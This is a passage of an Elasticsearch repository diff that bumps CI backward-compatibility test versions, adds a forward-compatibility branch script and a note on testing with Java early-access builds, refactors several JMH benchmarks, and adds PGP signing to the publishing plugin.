packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.17.9 + - label: "{{matrix.image}} / 8.17.10 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.17.10 timeout_in_minutes: 300 matrix: setup: @@ -316,10 +316,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 8.17.9 + BWC_VERSION: 8.17.10 - - label: "{{matrix.image}} / 8.18.4 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.18.4 + - label: "{{matrix.image}} / 8.18.7 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.18.7 timeout_in_minutes: 300 matrix: setup: @@ -332,10 +332,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 8.18.4 + BWC_VERSION: 8.18.7 - - label: "{{matrix.image}} / 8.19.0 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.19.0 + - label: "{{matrix.image}} / 8.19.4 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.19.4 timeout_in_minutes: 300 matrix: setup: @@ -348,10 +348,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 8.19.0 + BWC_VERSION: 8.19.4 - - label: "{{matrix.image}} / 9.0.4 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.0.4 + - label: "{{matrix.image}} / 9.0.7 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.0.7 timeout_in_minutes: 300 matrix: setup: @@ -364,10 +364,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 9.0.4 + BWC_VERSION: 9.0.7 - - label: "{{matrix.image}} / 9.1.0 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.1.0 + - label: "{{matrix.image}} / 9.1.4 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.1.4 timeout_in_minutes: 300 matrix: setup: @@ -380,7 +380,7 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 9.1.0 + BWC_VERSION: 9.1.4 - group: packaging-tests-windows steps: diff --git a/.buildkite/pipelines/periodic.template.yml b/.buildkite/pipelines/periodic.template.yml index 2ed6528f710c1..9a79ab80cce07 100644 --- a/.buildkite/pipelines/periodic.template.yml +++ b/.buildkite/pipelines/periodic.template.yml @@ -204,6 +204,17 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk - group: lucene-compat steps: - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" @@ -235,7 +246,7 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk - if: build.branch == "main" || build.branch == "8.19" || build.branch == "7.17" + if: build.branch =~ /^(main|\d+\.\d+|\d+\.x)$$/ - label: check-branch-consistency command: .ci/scripts/run-gradle.sh branchConsistency timeout_in_minutes: 15 diff --git a/.buildkite/pipelines/periodic.yml b/.buildkite/pipelines/periodic.yml index 5c6af6ba91a55..ff21d546e871b 100644 --- a/.buildkite/pipelines/periodic.yml +++ b/.buildkite/pipelines/periodic.yml @@ -325,8 +325,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 8.17.9 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.17.9#bwcTest + - label: 8.17.10 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.17.10#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -335,7 +335,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 8.17.9 + BWC_VERSION: 8.17.10 retry: automatic: - exit_status: "-1" @@ -344,8 +344,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 8.18.4 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.18.4#bwcTest + - label: 8.18.7 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.18.7#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -354,7 +354,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 8.18.4 + BWC_VERSION: 8.18.7 retry: automatic: - exit_status: "-1" @@ -363,8 +363,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 8.19.0 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.19.0#bwcTest + - label: 8.19.4 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.19.4#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -373,7 +373,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 8.19.0 + BWC_VERSION: 8.19.4 retry: automatic: - exit_status: "-1" @@ -382,8 +382,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 9.0.4 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.0.4#bwcTest + - label: 9.0.7 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.0.7#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -392,7 +392,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 9.0.4 + BWC_VERSION: 9.0.7 retry: automatic: - exit_status: "-1" @@ -401,8 +401,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 9.1.0 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.1.0#bwcTest + - label: 9.1.4 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.1.4#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -411,7 +411,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 9.1.0 + BWC_VERSION: 9.1.4 retry: automatic: - exit_status: "-1" @@ -487,7 +487,7 @@ steps: setup: ES_RUNTIME_JAVA: - openjdk21 - BWC_VERSION: ["8.17.9", "8.18.4", "8.19.0", "9.0.4", "9.1.0"] + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4"] agents: provider: gcp image: family/elasticsearch-ubuntu-2404 @@ -531,7 +531,7 @@ steps: ES_RUNTIME_JAVA: - openjdk21 - openjdk23 - BWC_VERSION: ["8.17.9", "8.18.4", "8.19.0", "9.0.4", "9.1.0"] + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4"] agents: provider: gcp image: family/elasticsearch-ubuntu-2404 @@ -623,6 +623,17 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk - group: lucene-compat steps: - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" @@ -654,7 +665,7 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk - if: build.branch == "main" || build.branch == "8.19" || build.branch == "7.17" + if: build.branch =~ /^(main|\d+\.\d+|\d+\.x)$$/ - label: check-branch-consistency command: .ci/scripts/run-gradle.sh branchConsistency timeout_in_minutes: 15 diff --git a/.buildkite/scripts/fwc-branches.sh b/.buildkite/scripts/fwc-branches.sh new file mode 100644 index 0000000000000..2bf0ff470dce7 --- /dev/null +++ b/.buildkite/scripts/fwc-branches.sh @@ -0,0 +1,24 @@ +#!/bin/bash + +# Configure FwC test branches +# We do not want 7.x branch and only to run for branches that: +# - have released at least one minor version (not main) +# - have previous minor unreleased (not the oldest development branch) +FWC_BRANCHES=() +for branch in "${BRANCHES[@]}"; do + if [[ ! "$branch" =~ ^7\..* ]]; then + FWC_BRANCHES+=("$branch") + fi +done +# Remove first and last element +FWC_BRANCHES=("${FWC_BRANCHES[@]:1:${#FWC_BRANCHES[@]}-2}") + +shouldRunFwcFor() { + local branch=$1 + for fwc_branch in "${FWC_BRANCHES[@]}"; do + if [[ "$fwc_branch" == "$branch" ]]; then + return 0 + fi + done + return 1 +} diff --git a/.buildkite/scripts/periodic.trigger.sh b/.buildkite/scripts/periodic.trigger.sh index 30e13386f3088..a987de8939084 100755 --- a/.buildkite/scripts/periodic.trigger.sh +++ b/.buildkite/scripts/periodic.trigger.sh @@ -5,6 +5,7 @@ set -euo pipefail echo "steps:" source .buildkite/scripts/branches.sh +source .buildkite/scripts/fwc-branches.sh IS_FIRST=true SKIP_DELAY="${SKIP_DELAY:-false}" @@ -46,8 +47,7 @@ EOF branch: "$BRANCH" commit: "$LAST_GOOD_COMMIT" EOF -# Include forward compatibility tests only for the bugfix branch -if [[ "${BRANCH}" == "${BRANCHES[2]}" ]]; then +if shouldRunFwcFor "$BRANCH"; then cat < [!Tip] +> [!Tip] > A manual confirmation of the Gradle generated checksums is currently not mandatory. > If you want to add a level of verification you can manually confirm the checksum (e.g. by looking it up on the website of the library) > Please replace the content of the `origin` attribute by `official site` in that case. @@ -186,6 +186,25 @@ dependencies { To test an unreleased development version of a third party dependency you have several options. +### How do I test against java pre-release versions like early access (ea) or release candidates (rc)? + +Currently only openjdk EA builds by oracle are supported. +To test against an early access version java version you can pass the major +java version appended with `-pre` as a system property (e.g. -Druntime.java=26-pre) to the Gradle build: + +``` +./gradlew clean test -Druntime.java=26-pre +``` + +This will run the tests using the JDK 26 pre-release version and pick the latest available build of the matching JDK EA version we expose +in our custom jdk catalogue at `https://builds.es-jdk-archive.com/jdks/openjdk/recent.json`. + +To run against a specific build number of the EA build you can pass a second system property (e.g. `-Druntime.java.build=6`): + +``` +./gradlew clean test -Druntime.java=26-pre -Druntime.java.build=6 +``` + #### How to use a Maven based third party dependency via `mavenlocal`? 1. Clone the third party repository locally @@ -229,7 +248,7 @@ In addition to snapshot builds JitPack supports building Pull Requests. Simply u 3. Run the Gradle build as needed. Keep in mind the initial resolution might take a bit longer as this needs to be built by JitPack in the background before we can resolve the adhoc built dependency. -> [!Note] +> [!Note] > You should only use that approach locally or on a developer branch for production dependencies as we do not want to ship unreleased libraries into our releases. @@ -261,7 +280,7 @@ allprojects { ``` 4. Run the Gradle build as needed with `--write-verification-metadata` to ensure the Gradle dependency verification does not fail on your custom dependency. -> [!Note] +> [!Note] > As Gradle prefers to use modules whose descriptor has been created from real meta-data rather than being generated, flat directory repositories cannot be used to override artifacts with real meta-data from other repositories declared in the build. > For example, if Gradle finds only `jmxri-1.2.1.jar` in a flat directory repository, but `jmxri-1.2.1.pom` in another repository diff --git a/README.asciidoc b/README.asciidoc index 7efdb64e5bb19..2dbf6d1f287ac 100644 --- a/README.asciidoc +++ b/README.asciidoc @@ -275,7 +275,7 @@ For the complete Elasticsearch documentation visit https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html[elastic.co]. For information about our documentation processes, see the -xref:docs/README.asciidoc[docs README]. +xref:https://github.com/elastic/elasticsearch/blob/main/docs/README.md[docs README]. [[examples]] == Examples and guides diff --git a/benchmarks/README.md b/benchmarks/README.md index af72d16d2ad4b..c5b8f5b9d2321 100644 --- a/benchmarks/README.md +++ b/benchmarks/README.md @@ -152,11 +152,10 @@ exit Grab the async profiler from https://github.com/jvm-profiling-tools/async-profiler and run `prof async` like so: ``` -gradlew -p benchmarks/ run --args 'LongKeyedBucketOrdsBenchmark.multiBucket -prof "async:libPath=/home/nik9000/Downloads/async-profiler-3.0-29ee888-linux-x64/lib/libasyncProfiler.so;dir=/tmp/prof;output=flamegraph"' +gradlew -p benchmarks/ run --args 'LongKeyedBucketOrdsBenchmark.multiBucket -prof "async:libPath=/home/nik9000/Downloads/async-profiler-4.0-linux-x64/lib/libasyncProfiler.so;dir=/tmp/prof;output=flamegraph"' ``` -Note: As of January 2025 the latest release of async profiler doesn't work - with our JDK but the nightly is fine. +Note: As of July 2025 the 4.0 release of the async profiler works well. If you are on Mac, this'll warn you that you downloaded the shared library from the internet. You'll need to go to settings and allow it to run. diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java index d2811962dd29d..3b4d445002073 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java @@ -70,11 +70,11 @@ public class QueryPlanningBenchmark { private EsqlParser defaultParser; private Analyzer manyFieldsAnalyzer; private LogicalPlanOptimizer defaultOptimizer; + private Configuration config; @Setup public void setup() { - - var config = new Configuration( + this.config = new Configuration( DateUtils.UTC, Locale.US, null, @@ -116,7 +116,7 @@ public void setup() { } private LogicalPlan plan(EsqlParser parser, Analyzer analyzer, LogicalPlanOptimizer optimizer, String query) { - var parsed = parser.createStatement(query, new QueryParams(), telemetry); + var parsed = parser.createStatement(query, new QueryParams(), telemetry, config); var analyzed = analyzer.analyze(parsed); var optimized = optimizer.optimize(analyzed); return optimized; diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmark.java similarity index 95% rename from benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmark.java rename to benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmark.java index a4504bedb3644..c41357c426fb0 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmark.java @@ -7,7 +7,7 @@ * License v3.0 only", or the "Server Side Public License, v 1". */ -package org.elasticsearch.benchmark.compute.operator; +package org.elasticsearch.benchmark._nightly.esql; import org.apache.lucene.document.FieldType; import org.apache.lucene.document.NumericDocValuesField; @@ -24,8 +24,10 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.NumericUtils; import org.elasticsearch.common.breaker.NoopCircuitBreaker; +import org.elasticsearch.common.logging.LogConfigurator; import org.elasticsearch.common.lucene.Lucene; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BytesRefBlock; @@ -41,7 +43,8 @@ import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.ShardRefCounted; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; import org.elasticsearch.compute.operator.topn.TopNOperator; import org.elasticsearch.core.IOUtils; import org.elasticsearch.index.IndexSettings; @@ -84,10 +87,22 @@ @State(Scope.Thread) @Fork(1) public class ValuesSourceReaderBenchmark { + static { + LogConfigurator.configureESLogging(); + } + + private static final String[] SUPPORTED_LAYOUTS = new String[] { "in_order", "shuffled", "shuffled_singles" }; + private static final String[] SUPPORTED_NAMES = new String[] { + "long", + "int", + "double", + "keyword", + "stored_keyword", + "3_stored_keywords" }; + private static final int BLOCK_LENGTH = 16 * 1024; private static final int INDEX_SIZE = 10 * BLOCK_LENGTH; private static final int COMMIT_INTERVAL = 500; - private static final BigArrays BIG_ARRAYS = BigArrays.NON_RECYCLING_INSTANCE; private static final BlockFactory blockFactory = BlockFactory.getInstance( new NoopCircuitBreaker("noop"), BigArrays.NON_RECYCLING_INSTANCE @@ -103,8 +118,8 @@ static void selfTest() { ValuesSourceReaderBenchmark benchmark = new ValuesSourceReaderBenchmark(); benchmark.setupIndex(); try { - for (String layout : ValuesSourceReaderBenchmark.class.getField("layout").getAnnotationsByType(Param.class)[0].value()) { - for (String name : ValuesSourceReaderBenchmark.class.getField("name").getAnnotationsByType(Param.class)[0].value()) { + for (String layout : ValuesSourceReaderBenchmark.SUPPORTED_LAYOUTS) { + for (String name : ValuesSourceReaderBenchmark.SUPPORTED_NAMES) { benchmark.layout = layout; benchmark.name = name; try { @@ -118,7 +133,7 @@ static void selfTest() { } finally { benchmark.teardownIndex(); } - } catch (IOException | NoSuchFieldException e) { + } catch (IOException e) { throw new AssertionError(e); } } @@ -320,10 +335,10 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { * each page has a single document rather than {@code BLOCK_SIZE} docs. * */ - @Param({ "in_order", "shuffled", "shuffled_singles" }) + @Param({ "in_order", "shuffled" }) public String layout; - @Param({ "long", "int", "double", "keyword", "stored_keyword", "3_stored_keywords" }) + @Param({ "long", "keyword", "stored_keyword" }) public String name; private Directory directory; @@ -335,6 +350,7 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { public void benchmark() { ValuesSourceReaderOperator op = new ValuesSourceReaderOperator( blockFactory, + ByteSizeValue.ofMb(1).getBytes(), fields(name), List.of(new ValuesSourceReaderOperator.ShardContext(reader, () -> { throw new UnsupportedOperationException("can't load _source here"); @@ -343,7 +359,7 @@ public void benchmark() { ); long sum = 0; for (Page page : pages) { - op.addInput(page); + op.addInput(page.shallowCopy()); switch (name) { case "long" -> { LongVector values = op.getOutput().getBlock(1).asVector(); @@ -411,7 +427,7 @@ public void benchmark() { throw new AssertionError("[" + layout + "][" + name + "] expected [" + expected + "] but was [" + sum + "]"); } boolean foundStoredFieldLoader = false; - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) op.status(); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); for (Map.Entry e : status.readersBuilt().entrySet()) { if (e.getKey().indexOf("stored_fields") >= 0) { foundStoredFieldLoader = true; diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java index d144d7601349d..cb4f898ab1dee 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java @@ -666,6 +666,11 @@ public Block eval(Page page) { return mask; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { mask.close(); diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java index 5bd003fe4271f..034ccc58f6b61 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java @@ -144,7 +144,7 @@ static void selfTest() { public String operation; private static Operator operator(String operation) { - return new EvalOperator(driverContext.blockFactory(), evaluator(operation)); + return new EvalOperator(driverContext, evaluator(operation)); } private static EvalOperator.ExpressionEvaluator evaluator(String operation) { diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java index 238540bf2c799..879418e7f954c 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java @@ -95,7 +95,8 @@ static void selfTest() { try { for (String groups : ValuesAggregatorBenchmark.class.getField("groups").getAnnotationsByType(Param.class)[0].value()) { for (String dataType : ValuesAggregatorBenchmark.class.getField("dataType").getAnnotationsByType(Param.class)[0].value()) { - run(Integer.parseInt(groups), dataType, 10); + run(Integer.parseInt(groups), dataType, 10, 0); + run(Integer.parseInt(groups), dataType, 10, 1); } } } catch (NoSuchFieldException e) { @@ -113,7 +114,10 @@ static void selfTest() { @Param({ BYTES_REF, INT, LONG }) public String dataType; - private static Operator operator(DriverContext driverContext, int groups, String dataType) { + @Param({ "0", "1" }) + public int numOrdinalMerges; + + private static Operator operator(DriverContext driverContext, int groups, String dataType, int numOrdinalMerges) { if (groups == 1) { return new AggregationOperator( List.of(supplier(dataType).aggregatorFactory(AggregatorMode.SINGLE, List.of(0)).apply(driverContext)), @@ -125,7 +129,24 @@ private static Operator operator(DriverContext driverContext, int groups, String List.of(supplier(dataType).groupingAggregatorFactory(AggregatorMode.SINGLE, List.of(1))), () -> BlockHash.build(groupSpec, driverContext.blockFactory(), 16 * 1024, false), driverContext - ); + ) { + @Override + public Page getOutput() { + mergeOrdinal(); + return super.getOutput(); + } + + // simulate OrdinalsGroupingOperator + void mergeOrdinal() { + var merged = supplier(dataType).groupingAggregatorFactory(AggregatorMode.SINGLE, List.of(1)).apply(driverContext); + for (int i = 0; i < numOrdinalMerges; i++) { + for (int p = 0; p < groups; p++) { + merged.addIntermediateRow(p, aggregators.getFirst(), p); + } + } + aggregators.set(0, merged); + } + }; } private static AggregatorFunctionSupplier supplier(String dataType) { @@ -331,12 +352,12 @@ private static Block groupingBlock(int groups) { @Benchmark public void run() { - run(groups, dataType, OP_COUNT); + run(groups, dataType, OP_COUNT, numOrdinalMerges); } - private static void run(int groups, String dataType, int opCount) { + private static void run(int groups, String dataType, int opCount, int numOrdinalMerges) { DriverContext driverContext = driverContext(); - try (Operator operator = operator(driverContext, groups, dataType)) { + try (Operator operator = operator(driverContext, groups, dataType, numOrdinalMerges)) { Page page = page(groups, dataType); for (int i = 0; i < opCount; i++) { operator.addInput(page.shallowCopy()); diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/xcontent/JsonParserBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/xcontent/JsonParserBenchmark.java new file mode 100644 index 0000000000000..a49f01f81c34f --- /dev/null +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/xcontent/JsonParserBenchmark.java @@ -0,0 +1,87 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.benchmark.xcontent; + +import org.elasticsearch.common.bytes.BytesReference; +import org.elasticsearch.common.io.Streams; +import org.elasticsearch.xcontent.XContentParser; +import org.elasticsearch.xcontent.XContentParserConfiguration; +import org.elasticsearch.xcontent.XContentType; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.io.IOException; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Random; +import java.util.concurrent.TimeUnit; +import java.util.stream.Collectors; + +@Fork(1) +@Warmup(iterations = 5) +@Measurement(iterations = 10) +@BenchmarkMode(Mode.AverageTime) +@OutputTimeUnit(TimeUnit.NANOSECONDS) +@State(Scope.Thread) +public class JsonParserBenchmark { + private Map sourceBytes; + private BytesReference source; + private Random random; + private List sourcesRandomized; + + final String[] sources = new String[] { "monitor_cluster_stats.json", "monitor_index_stats.json", "monitor_node_stats.json" }; + + @Setup(Level.Iteration) + public void randomizeSource() { + sourcesRandomized = Arrays.asList(sources); + Collections.shuffle(sourcesRandomized, random); + } + + @Setup(Level.Trial) + public void setup() throws IOException { + random = new Random(); + sourceBytes = Arrays.stream(sources).collect(Collectors.toMap(s -> s, s -> { + try { + return readSource(s); + } catch (IOException e) { + throw new RuntimeException(e); + } + })); + } + + @Benchmark + public void parseJson(Blackhole bh) throws IOException { + sourcesRandomized.forEach(source -> { + try { + final XContentParser parser = XContentType.JSON.xContent() + .createParser(XContentParserConfiguration.EMPTY, sourceBytes.get(source).streamInput()); + bh.consume(parser.mapOrdered()); + } catch (IOException e) { + throw new RuntimeException(e); + } + }); + } + + private BytesReference readSource(String fileName) throws IOException { + return Streams.readFully(JsonParserBenchmark.class.getResourceAsStream(fileName)); + } +} diff --git a/benchmarks/src/test/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmarkTests.java b/benchmarks/src/test/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmarkTests.java similarity index 92% rename from benchmarks/src/test/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmarkTests.java rename to benchmarks/src/test/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmarkTests.java index 7d72455f9fb22..e1d2b8f43100c 100644 --- a/benchmarks/src/test/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmarkTests.java +++ b/benchmarks/src/test/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmarkTests.java @@ -7,7 +7,7 @@ * License v3.0 only", or the "Server Side Public License, v 1". */ -package org.elasticsearch.benchmark.compute.operator; +package org.elasticsearch.benchmark._nightly.esql; import org.elasticsearch.test.ESTestCase; diff --git a/branches.json b/branches.json deleted file mode 100644 index a2feaf0715575..0000000000000 --- a/branches.json +++ /dev/null @@ -1,26 +0,0 @@ -{ - "notice": "This file is not maintained outside of the main branch and should only be used for tooling.", - "branches": [ - { - "branch": "main" - }, - { - "branch": "9.1" - }, - { - "branch": "9.0" - }, - { - "branch": "8.19" - }, - { - "branch": "8.18" - }, - { - "branch": "8.17" - }, - { - "branch": "7.17" - } - ] -} diff --git a/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java b/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java index d3f03b9534be3..1b5dad2f3a3ec 100644 --- a/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java +++ b/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java @@ -10,12 +10,10 @@ package org.elasticsearch.gradle.internal.conventions; import groovy.util.Node; +import nmcp.NmcpPlugin; -import com.github.jengelman.gradle.plugins.shadow.ShadowExtension; import com.github.jengelman.gradle.plugins.shadow.ShadowPlugin; -import nmcp.NmcpPlugin; - import org.elasticsearch.gradle.internal.conventions.info.GitInfo; import org.elasticsearch.gradle.internal.conventions.precommit.PomValidationPrecommitPlugin; import org.elasticsearch.gradle.internal.conventions.util.Util; @@ -41,6 +39,8 @@ import org.gradle.api.tasks.bundling.Jar; import org.gradle.initialization.layout.BuildLayout; import org.gradle.language.base.plugins.LifecycleBasePlugin; +import org.gradle.plugins.signing.SigningExtension; +import org.gradle.plugins.signing.SigningPlugin; import org.w3c.dom.Element; import java.io.File; @@ -69,6 +69,7 @@ public void apply(Project project) { project.getPluginManager().apply(PomValidationPrecommitPlugin.class); project.getPluginManager().apply(LicensingPlugin.class); project.getPluginManager().apply(NmcpPlugin.class); + project.getPluginManager().apply(SigningPlugin.class); configureJavadocJar(project); configureSourcesJar(project); configurePomGeneration(project); @@ -79,6 +80,13 @@ public void apply(Project project) { private void configurePublications(Project project) { var publishingExtension = project.getExtensions().getByType(PublishingExtension.class); var publication = publishingExtension.getPublications().create("elastic", MavenPublication.class); + Provider signingKey = project.getProviders().gradleProperty("signingKey"); + if (signingKey.isPresent()) { + SigningExtension signing = project.getExtensions().getByType(SigningExtension.class); + signing.useInMemoryPgpKeys(signingKey.get(), project.getProviders().gradleProperty("signingPassword").get()); + signing.sign(publication); + } + project.afterEvaluate(project1 -> { if (project1.getPlugins().hasPlugin(ShadowPlugin.class)) { configureWithShadowPlugin(project1, publication); @@ -164,8 +172,9 @@ private void addNameAndDescriptionToPom(Project project, NamedDomainObjectSet { + public static final String VERSIONS_EXT = "versions"; + @Override public void apply(Project project) { File workspaceDir = Util.locateElasticsearchWorkspace(project.getGradle()); @@ -28,6 +30,6 @@ public void apply(Project project) { .registerIfAbsent("versions", VersionPropertiesBuildService.class, spec -> { spec.getParameters().getInfoPath().set(infoPath); }); - project.getExtensions().add("versions", 